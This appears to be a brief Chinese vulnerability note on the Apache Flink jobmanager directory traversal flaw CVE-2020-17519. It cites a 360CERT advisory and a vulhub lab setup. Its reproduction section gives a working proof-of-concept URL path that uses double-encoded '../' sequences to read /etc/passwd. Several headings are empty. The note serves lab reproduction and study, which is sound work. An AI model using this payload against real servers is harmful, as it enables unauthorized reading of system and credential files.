# Apache Flink jobmanager 目录遍历漏洞 CVE-2020-17519

# 漏洞描述

2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞,目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。 远程攻击者通过REST API目录遍历,可造成文件读取/写入的影响。

# 漏洞影响




# 网络测绘

# 环境搭建

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519

06d235d4-965d-44e0-91c0-dc69b97bf48d

# 漏洞复现

验证POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
1

a87cedc1-5a40-42bb-a377-9bdb03fad242